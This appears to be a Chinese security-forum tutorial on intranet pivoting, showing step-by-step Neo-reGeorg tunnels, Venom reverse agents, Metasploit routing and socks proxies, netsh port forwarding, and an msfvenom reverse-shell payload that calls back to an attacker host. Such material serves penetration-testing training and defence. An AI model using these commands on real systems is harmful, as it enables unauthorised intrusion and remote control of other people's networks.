奇安信攻防社区-浅谈内网代理与流量转发

浅谈内网代理与流量转发

# 前言我们在内网渗透的过程中一般进入内网过后都是使用代理软件正向或反向连接来达到进入对方内网的目的，但是不同网络环境的情况下使用到的方法又不尽相同，这里就对一些环境的流量转...

前言
==

我们在内网渗透的过程中一般进入内网过后都是使用代理软件正向或反向连接来达到进入对方内网的目的，但是不同网络环境的情况下使用到的方法又不尽相同，这里就对一些环境的流量转发结合一些实际操作来谈谈自己的理解。

一层网络
====

一层网络的话考虑到的问题不多，主要有以下两3点：

```php
1. 靶机是否有公网ip?
2. 代理的稳定性?
```

首先是第一点，如果靶机有公网ip则直接使用正向连接，如果没有公网ip，我们访问不到内网主机，那么就让内网主机访问我们，使用反向连接

正向连接我一般使用的是Neo-reGeorg，这款代理软件走的是http协议，也就是说如果靶机限制了web流量的出站的话就需要使用其他代理软件，这里就简单写下操作

首先使用命令生成脚本，密码为123456

```php
python neoreg.py generate -k 123456
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3743f9a924536478ba604655b0d56b52f2db649d.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3743f9a924536478ba604655b0d56b52f2db649d.png)

在当前目录下就会生成一个文件夹，根据脚本类型上传马即可，这里使用的是php的脚本

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-656f760b345386742dd9a931383bfb5a51f9371a.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-656f760b345386742dd9a931383bfb5a51f9371a.png)

将`tunnel.php`上传到靶机的web目录下

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-fd18e6e4a773ba0c94820a1f8614abc763111cc0.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-fd18e6e4a773ba0c94820a1f8614abc763111cc0.png)

执行命令，可以看到已经代理到了本地的1080端口

```php
python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-958fb7ed1fde031fe0d5a77a58a82f157762526f.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-958fb7ed1fde031fe0d5a77a58a82f157762526f.png)

然后使用proxifer代理本地的1080端口即可访问内网资源

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3c15901908e3e0e8080d488db8f48ba3a43248e7.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3c15901908e3e0e8080d488db8f48ba3a43248e7.png)

反向连接的话我一般使用的是venom，好处的话我个人觉得它的命令相比于其他代理软件比较好记，所以一般用的比较多，也简单写下操作

首先在攻击机上监听7777端口

```php
admin.exe -lport 7777
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a37a20fa499acdf55df286cea1a82cea698c1e4b.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a37a20fa499acdf55df286cea1a82cea698c1e4b.png)

然后在靶机上执行命令

```php
agent.exe -rhost 192.168.10.8 -rport 7777
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-563f3d6a66e00d37ae5c0c59ee2ac23d712fe6db.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-563f3d6a66e00d37ae5c0c59ee2ac23d712fe6db.png)

返回攻击机执行命令将7777端口接收到的数据转换到5555端口

```php
goto 1
socks 5555
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-dfa90893c781c2f4030b0cdbf42c374be7c45d3e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-dfa90893c781c2f4030b0cdbf42c374be7c45d3e.png)

然后使用proxifier代理本地的5555端口

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-57b3a03e59b6507bcc50438229e7d1da43cf80c0.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-57b3a03e59b6507bcc50438229e7d1da43cf80c0.png)

可以看到这里已经代理成功

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f0c5265b7120126532a6256c5eb52949805b4e12.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f0c5265b7120126532a6256c5eb52949805b4e12.png)

访问内网的iis服务器即可成功

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a380a3736bc08eb164bed98e547d8277a2c55ee5.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a380a3736bc08eb164bed98e547d8277a2c55ee5.png)

第二点的话在一层网络的情况下其实稳定性都差异不大，如果是反向连接的话主要取决于vps传输的稳定性，但是在二层、三层网络的情况下确实有些差异，这里我后面会提到。

二层网络
====

何为二层网络？这里一个不太正规但是比较通俗的理解就是使用两次代理软件转发了两次，其实就是在内网中存在两个网段的主机

比如说我公网的vps的ip为25.36.87.95(这里乱写的打个比方)，然后我拿到了公网ip为36.58.69.58(同打比方)的一个shell，内网主机的ip为192.168.2.22。

那么这里ip地址为192.168.2.1-192.168.2.255的主机都在同一网段，如果说我们上线了另外一台主机ip是192.168.2.23，这不能称得上是二层代理，在信息搜集的时候，我们发现ip为192.168.2.22这台主机和A段下的ip为10.10.1.3这台主机建立了ipc连接，如果我们要拿到10.10.1.3这台主机的shell或者上线cs/msf，这才能称得上二层网络代理转发

这里提一个点，不同网段并不是一个ip在C段(192)，一个ip在A段(10)才称得上同一网段，这里如果另外一个与靶机建立ipc连接的主机的ip为192.168.3.3，我们香要上线或拿webshell，也称得上是二层网络

这里还是顺着一层网络的三个问题继续展开，首先是第一点，在二层网络的情况下是否有公网ip已经不重要了，因为是否有公网ip只影响我们内网入口的那台主机的连接方式，这里我们已经进入内网了，这个问题就没有意义了，第二点同一层网络，主要说说第三点

在测试与实战的过程中，我发现最稳定的是venom和frp，其他的要么容易断线，要么进行扫描的时候很慢，在二层网络的情况下，我用得最多的还是msf，因为msf添加路由这个功能实在是太香了，无论你有几层都直接添加路由配合socks代理带出来即可，cs这方面就差一点

这里主要演示一下在二层网络中使用msf，这里假设我已经拿到了192.168.2.189这台主机的shell(这里假设我的kali为公网ip，就已经是一层网络)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7acbfce6da5d77749bc55945aad5fc90aa7ce08e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7acbfce6da5d77749bc55945aad5fc90aa7ce08e.png)

然后nmap进行扫描得到一个同网段双网卡主机ip为192.168.2.122/10.10.1.129通过漏洞上线到msf(这里就不具体说漏洞的利用了，主要是说下二层网络代理的利用)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7781f4caf7a27f37021f31b8ba70506bfde0ebac.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7781f4caf7a27f37021f31b8ba70506bfde0ebac.png)

这时候我们拿到了一台双网卡主机，通向10.10.1.0/24段

这里首先添加路由，拿到的这个双网卡session为4

```php
route add 10.10.1.0 255.255.255.0 4
route print

use auxiliary/server/socks_proxy
set version 4a
run
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3724c73204ea96326abf2b9f970a371abfd301c6.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3724c73204ea96326abf2b9f970a371abfd301c6.png)

然后使用proxychain配合nmap扫描出另外一个处于10.10.1.0/24网段主机的ip为10.10.1.128，可以通过ipc空连接向其传输文件。这时候我们如果直接使用msf生成的木马去上线是不行的，因为10.10.1.0/24这个网段里面的主机可能处于不出网环境下，是访问不到公网ip的，这时候就需要进行流量转发

这个地方两层网络的流量就是从10.10.1.0 -&gt; 192.168.2.0-&gt;公网ip，通过10.10.1.129主机当作跳板，把所有经过这台主机的流量全部转到kali上面去

这里为了方便执行windows命令，首先msf给cs派生一个对话

```php
use exploit/windows/local/payload_inject
set lhost 192.168.2.161
set lport 5555
set sessions 4
run
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b463566f76c4b537fb5347df1c27a890e2ef51cb.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b463566f76c4b537fb5347df1c27a890e2ef51cb.png)

cs打开一个监听端口

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-593f7f7eb3b9b6e367a623dbe45c9a7daf3e60d7.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-593f7f7eb3b9b6e367a623dbe45c9a7daf3e60d7.png)

msf里面执行，cs中即可上线

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-013ef8cc878611babf16eb7173820d9ed96e162d.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-013ef8cc878611babf16eb7173820d9ed96e162d.png)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-813573bf0e6638ef1f77d877ce9ca74cdb073be1.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-813573bf0e6638ef1f77d877ce9ca74cdb073be1.png)

这里我们把`192.168.2.122/10.10.1.129`这台主机当作跳板，那么就把所有经过这台主机的流量全部转发到kali(公网ip的vps)上，使用到ipsec

这里简单说一下ipsec

> IPsec被设计用来提供（1）入口对入口[通信安全](https://baike.baidu.com/item/%E9%80%9A%E4%BF%A1%E5%AE%89%E5%85%A8)，在此机制下，分组通信的安全性由单个节点提供给多台机器（甚至可以是整个[局域网](https://baike.baidu.com/item/%E5%B1%80%E5%9F%9F%E7%BD%91)）；（2）端到端分组通信安全，由作为端点的计算机完成安全操作。上述的任意一种模式都可以用来构建[虚拟专用网](https://baike.baidu.com/item/%E8%99%9A%E6%8B%9F%E4%B8%93%E7%94%A8%E7%BD%91)（VPN），而这也是IPsec最主要的用途之一。应该注意的是，上述两种操作模式在安全的实现方面有着很大差别。
> 
> 因特网范围内[端到端通信](https://baike.baidu.com/item/%E7%AB%AF%E5%88%B0%E7%AB%AF%E9%80%9A%E4%BF%A1/3223228)安全的发展比预料的要缓慢，其中部分原因，是因为其不够普遍或者说不被普遍信任。[公钥基础设施](https://baike.baidu.com/item/%E5%85%AC%E9%92%A5%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD)能够得以形成（[DNSSEC](https://baike.baidu.com/item/DNSSEC)最初就是为此产生的），一部分是因为许多用户不能充分地认清他们的需求及可用的选项，导致其作为内含物强加到卖主的产品中（这也必将得到广泛采用）；另一部分可能归因于网络响应的退化（或说预期退化），就像兜售信息的充斥而带来的带宽损失一样。

那么这里我们在cs上执行命令，添加一条ipsec入站规则，这里相当于在10.10.1.129这台主机上打开7788监听端口，转发到192.168.2.105(kali ip即vps的公网IP)的7788端口

```php
shell netsh interface portproxy add v4tov4 listenport=7788 connectaddress=192.168.2.105 connectport=7788
```

然后使用命令查看是否添加成功

```php
shell netsh interface portproxy show all
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b01ddd23b1680877d6eb0f407c92912dc85dd14e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b01ddd23b1680877d6eb0f407c92912dc85dd14e.png)

那么到这个地方就相当于我们在10.10.1.129的7788端口得到的所有流量都会被转发到公网的kali上，这里我们再使用msf生成木马的时候lhost就需要写的是内网主机的ip，即10.10.1.129

```php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.129 LPORT=7788 -f exe > abc.exe 
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-bbda4ea8d115219eec19ac8e8d50a35c24a33034.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-bbda4ea8d115219eec19ac8e8d50a35c24a33034.png)

然后psexec连接过去执行即可上线msf，这里可以看到connection这个地方是10.10.1.128-&gt;192.168.2.122(10.10.1.129)-&gt;192.168.2.105(模拟公网ip)，上线成功

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-4089f51a043a0ed2cb8eb6f08c7f312da0d4ae56.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-4089f51a043a0ed2cb8eb6f08c7f312da0d4ae56.png)

另外在cs上也可以对二层网络进行上线，部署监听中转即可，还是演示一下

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c2c91355310799df4e720dae86a01e53aa1d869d.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c2c91355310799df4e720dae86a01e53aa1d869d.png)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b0a90989167d3e7e4343de18888fd9552dda3066.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b0a90989167d3e7e4343de18888fd9552dda3066.png)

然后生成一个木马

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-107bccf38bb4375639394766d27c065f5d287937.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-107bccf38bb4375639394766d27c065f5d287937.png)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b91db7cded7fa49898eb4a8601247c3b0deac327.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b91db7cded7fa49898eb4a8601247c3b0deac327.png)

执行即可上线

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a1e9b9bbc377ab7c7d89bfc16ef8751533869aa9.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a1e9b9bbc377ab7c7d89bfc16ef8751533869aa9.png)

另外二层网络这一块说了上线主机的情况，那么在特殊条件下执行命令没有这么简单，而是通过web后台写入shell，而处于二层网络的情况下直接连接也是连接不上的，这里就需要使用到代理

这里我拿到了一个ip为192.168.2.218的meterpreter，然后扫描得到10.10.1.130为一个\*达OA存在漏洞可直接getshell

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-bc548c0a7a678c1b93f0db1e76e53f66c55e3756.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-bc548c0a7a678c1b93f0db1e76e53f66c55e3756.png)

这里使用proxychain访问下是能访问到的，但是如果我们在公网直接去连接是连接不到的

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b48218c9b73fb03bb807442242c11f8f330cb97c.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b48218c9b73fb03bb807442242c11f8f330cb97c.png)

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3c21e9be517e0ae7f244fedd51738ba4da90ae85.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3c21e9be517e0ae7f244fedd51738ba4da90ae85.png)

所以首先要添加10.10.1.0段的路由

```php
run autoroute -s 10.10.1.0/24run autoroute -p
```

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e2076a0c0cb4269bc7f6ffbae3783d407f7de0a9.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e2076a0c0cb4269bc7f6ffbae3783d407f7de0a9.png)

使用socks4a模块

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-2e6295e20f72066880b74ac80be7c4dab4096694.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-2e6295e20f72066880b74ac80be7c4dab4096694.png)

配置proxychains.conf

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-23bf1a43d65db4fe9bb49424b4ffe4862d9679ca.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-23bf1a43d65db4fe9bb49424b4ffe4862d9679ca.png)

这时候我们打开公网ip的1080端口就已经拿到了meterpreter的流量，这时候我们再用webshell连接工具配合代理连接即可连接到二层网络的shell

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-9eb3101cc327d24e1a03c21b532108b96e77e5ba.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-9eb3101cc327d24e1a03c21b532108b96e77e5ba.png)

添加php测试连接成功

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c3f761d32b2fa3c3caacc5608c0484e70432c1a7.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c3f761d32b2fa3c3caacc5608c0484e70432c1a7.png)

冰蝎也是大同小异使用代理即可

[![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-76d3f5f905fa2333c5e67cbd74fbdde80f8f45cb.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-76d3f5f905fa2333c5e67cbd74fbdde80f8f45cb.png)

后记
==

三层代理的情况遇到的很少，可以说是基本没有遇到过，这里就不演示打法了。但是思路都是大同小异，通过边缘主机(即又能访问外网，又能与内网主机通信的机器)来进行流量的转发让我们公网ip的主机能够访问到内网的机器。不过有一点是我在比较疑惑的，在二层网络的情况下，如果存在weblogic、jboss等能通过jar一键getshell的主机，直接使用proxychain是代理不进去的，而且这种jar一般也不像冰蝎、蚁剑那样自带代理功能，这时候就只能我们手动去打了？

另外提一个点，frp跟nps在多层网络里面也是很吃香的，但是这两款软件只能起一个代理的作用，相比于cs、msf的集成功能还是差点意思，所以这里我就没有单独演示frp跟nps，如果单纯论代理软件的话frp跟nps也是比较稳定的。

发表于 2021-10-09 14:05:40
阅读 ( 6182 )
分类：内网渗透

2 条评论

WFG 2021-11-09 20:51

强

mrfan 2021-11-14 19:55

不懂就问, 为啥一层网络都是属于一个内网中, 但是一个单单的外网ip, 去访问还是访问不了的啊, 所以作者应该写多一个流量转发到一个带有外网ip的主机,且同时拥有内网ip ,从而外网才能成功访问到